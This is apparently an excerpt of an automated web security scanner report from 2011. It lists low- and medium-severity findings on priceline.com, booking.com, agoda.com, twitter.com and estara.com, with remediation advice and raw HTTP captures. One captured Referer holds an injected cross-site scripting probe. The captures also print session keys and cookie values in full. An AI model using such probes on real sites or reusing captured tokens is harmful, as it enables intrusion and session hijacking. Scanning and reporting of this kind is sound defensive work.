10.31. http://www.priceline.com/hotels/lang/en-us/itinerary.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.priceline.com
Path:   /hotels/lang/en-us/itinerary.asp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /hotels/lang/en-us/itinerary.asp?session_key=721510AC6F1410AC2011100300373191ec11270735&plf=pcln&RefID=PLAWAYNETWORK&RefClickID=TRIP_HOTELSEARCH HTTP/1.1
Host: www.priceline.com
Proxy-Connection: keep-alive
Content-Length: 345
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; PSessKey=721510AC6F1410AC2011100300373191ec11270735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

OFFER%2FHOTELS%2F%40SEARCH_CITY=bos&OFFER%2FHOTELS%2F%40ROOM_COUNT=1&OFFER%2FHOTELS%2F%40ZONEID=&checkInDate=10%2F09%2F2011&CkInMonth=10&CkInDay=09&CkInYear=2011&checkOutDate=10%2F16%2F2011&CkOutMonth
...[SNIP]...

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 00:39:09 GMT
Server: Microsoft-IIS/6.0
Location: http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20111003003909435251213033&plf=pcln&KT=Y&ASID=514
Content-Length: 278
Content-Type: text/html
Set-Cookie: PSessKey=711510AC721510AC20111003003909435251213033; domain=.priceline.com; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.priceline.com/hotels/Lang/en-us/retail/retail_bounce.asp?session_key=711510AC721510AC20
...[SNIP]...
11. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /index.en-us.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel57'%3balert(document.location)//f/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74miFZb2Um8KgC%2Bh2rlNFJUOjhhIgDQiMlPWhvbR49z9NRCDXfmSFpQembJKACe%2BJULD0r7fdmKnWzXr6Q37gpPtlW%2B6Ycux8%2BQPqDGsS1KPc9u0j692wwry%2B1siL5lr7hR9RhSAx8eI5I5k7yEH5VzxQ664kWGsWIUlKeHSweLMihfk6DPyMYhl866qu17PfAa6RO7hkvCmVs2v%2BaHqg7PJzGQbn7fwikGZMVbIAz4LrPjzYz6RGzlbxPK5%2F6ncWhf61P8AYKmRsuHJABk5Lxudx1AECQ0vDe%2B5%2F1VK1DpRN%2FD3xPq17PxcY9moJWiAb%2BjDEsnffG8T15GZqbMnfilArnMwyxxOT479XlQbNZXA5wZsuxCJNcZhMvajEXssRbYOUmix6AuHsUneEzF62bP002BL%2BgHy8NmOxhlKYaZlXZminydIqX%2Fu%2FBy9TbfbjXbd6r03fOvrqSW1QZ5jOepBwaJyVDLVWgjbd7NGZGnNsrR8ymzJg6wSt%2BGBUXZRUrcXlY6XVXUb8p7iRLBqAwcZN69gzv7DlytCjEgIc8%2F1Pep0%2Bm1h%2BeZlaydw4HC8erBX0MQS0wB%2BXiV0wXshT55Dj0GZBEX9npRlDKVH1zcH5tfl%2BmWNqGH5XrB8at9vS%2BFPgBOKqzPuPTEEm8M58LZw0SljaZgLLizNagYMqS2INu%2FxnbGaVC%2ByaJm99%2BSM7Is7WKkS82lDPlkm2julAIA%2Bq8cNhWIfpowac5T4r5u8Fn6f47z4hzIRARVjqBajBoVpoaNDPINwfkzD4VfF56AGT0g5nl8Q7zNch34tNcMpk1%2BpxM9%2BeaPaq8rTMHiSOsqbFRFOpXlvDxoUc439HccepEUKuW5qaj1VtdMlnVkiFiM%2Bv%2FwpfCePqzf0HGDSWdKf4NdncvuGc4CXQI%2BcT1om0pVGjGqsomGmH5HTip5D56Qw4RbL1v%2BcB6vVJ8%2F%2BKKQpUqdlMXTFa1kXsfq1zqNHmx93uxn4vcRnr2nx4M%2Fa2unp0CpnQQtAdh8E%2FREJ8eW%2FMdmAsrtsIFg0YBu5y4jzrewC%2FkgM9lOWRIg7XukObhLsYxWaE2laG%2B2TpO4jVJz35UlsuhFr2M5p%2Bd57HfkCUX%2BZTXu6qnSpFmzXSfgDeuWJWTFzXoBQEohozrytDzbYjlfb%2B7JSaJ1vXhcy15EpDbJEyN7kfvx%2Bi4F9skpy0c1fc5ZZIjkPBPbd9qFhsWxA8UMVqn8PV68J38KAFmJ4JSDNSSjUndN8EgnrUkMPtAr2yReY1C1LjICryrAap9gVMLJKV9n8njP4Nsr%2BXpDV7BLYvLgTFOQ; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.5.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=12.6519598960876

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:30:58 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:30:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 201048
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<input type="hidden" name="sid" value="9fcdaabed9e2bb46b60772539b0ca101" />

<form id="subscriber_account_active" action="https://secure.booking.com/login.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;">
<input type="hidden" name="op" value="register">
...[SNIP]...
</label>
<input style="float: right;" type="password" name="password" value=""></li>
...[SNIP]...
</label>
<input style="float: right;" type="password" name="password_confirm" value=""></li>
...[SNIP]...
12. ASP.NET ViewState without MAC enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.agoda.com
Path:   /

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Request

GET / HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 03 Oct 2011 00:38:30 GMT
Content-Length: 221222


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns:og="http://opengraphproto
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
...[SNIP]...
13. Cookie scoped to parent domain  previous  next
There are 179 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

13.1. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=goal_intl&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=5&clientsource=TWITTERINC_WIDGET&1317599944868=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; k=10.35.22.124.1317385056818946; external_referer=ZLhHHTiegr93cD84PZkyRqf9EoFxAAGiT%2F0jMHbZrcFB29W7H3tcaIGESzWrcIvCHb8W50GSwrcQe2RZEXpR1wwB6U6khrBbnKvI13rVW%2F4DTuA%2BtaolAW5CfRZjXVgRMm5ohI%2BpGWoFvfn8EIm9nTPeiHgUxMO9S3a5uaQjgagOnqp96%2FFzs27Y%2Fe%2B3b3sx%7C0; __utma=43838368.1721518288.1314976448.1317595795.1317595795.7; __utmb=43838368.2.10.1317595795; __utmz=43838368.1317595795.6.6.utmcsr=status.twitter.com|utmccn=(referral)|utmcmd=referral|utmcct=/; ab_sess_remember_me_on_signup_83=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:00:30 GMT
Status: 200 OK
X-Transaction: 61f46ab37e88dc8e
X-RateLimit-Limit: 150
ETag: "2f4cb01229388f621f6d7f8c92c02774"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 03 Oct 2011 00:00:30 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02507
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114349dfad6
Content-Type: application/javascript; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: ed9090d8f4e1233909edcfb3fdcc1cf37ea299f5
X-RateLimit-Reset: 1317603558
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCHWE8cyASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTc2%250AYzZjNDk3OTg0ZmYwYTg0NjYyZDg4MzE0MjFhMzBj--3cd45407d96b1a446d7041edbb7385311f792aa8; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 10038
Server: tfe

TWTR.Widget.receiveCallback_1([{"geo":null,"favorited":false,"coordinates":null,"id_str":"120645100576579584","retweet_count":5,"in_reply_to_screen_name":null,"in_reply_to_user_id":null,"possibly_sens
...[SNIP]...
13.2. http://as00.estara.com/fs/rules.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://as00.estara.com
Path:   /fs/rules.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs/rules.php?accountid=200106297609&title=Priceline.com%20-%20hotel%2C%20hotel%20reservation%2C%20cheap%20hotel%2C%20las%20vegas%20hotel%2C%20boston%20hotel%2C%20hotel%20deal%2C%20ne&referrer=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchHotels.do%3Fsession_key%3D711510AC721510AC2011100300374475eeb1270807%26plf%3Dpclh%26INIT_SESSION%3Dtrue%26refid%3DPLAWAYNETWORK%26refclickid%3DTRIP_HOTELSEARCH%26searchType%3DCITY%26cityName%3Dbos%26numberOfRooms%3D1%26hotelBrand%3D%26searchHotelName%3D%26starRating%3D-1%26checkInDate%3D10%252F09%252F2011%26checkOutDate%3D10%252F16%252F2011%26KMode%3DY%26selectedTab%3D0%26passingValues%3DYES%26affiliateSubID%3D514A&w=1920&h=1200&d=16&platform=Win32&ua=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.187%20Safari%2F535.1&cs=ISO-8859-1&estara_fsguid=5860EEFA281121EC93852AEC182A3278&estara_firsttime=1317600765&location=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchResults.do%3Fjsk%3D4663010a5564010a20111003003755e18011569968%26key%3Dgtaqdik9%26showDP%3Dy%26NYOPRedirNI%3Dnull&dnc=131760243799780739 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8oZYOjqPcac2AJWTIJJNMUdcUkRqhXRRD8AlEvZCuhhEPBFP1BP1hDyhQTKoGKmik9KikVOFkdKKQXbRSAIJ5naITsqVHpVWMQh6gkZIchoFNeUYjHtUNsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmE6IkxHhKmw4AsTjODqqGrkMYjL25VnOjF1N6J8tFX0Dw__

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:41 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Cache-Control: private, max-age=2592000
Set-Cookie: fsserver__SESSION__=s-5201.estara.com; path=/fs; domain=.estara.com
Set-Cookie: fsserver__SESSION____SECURE__=s-5201.estara.com; path=/fs; domain=.estara.com; secure
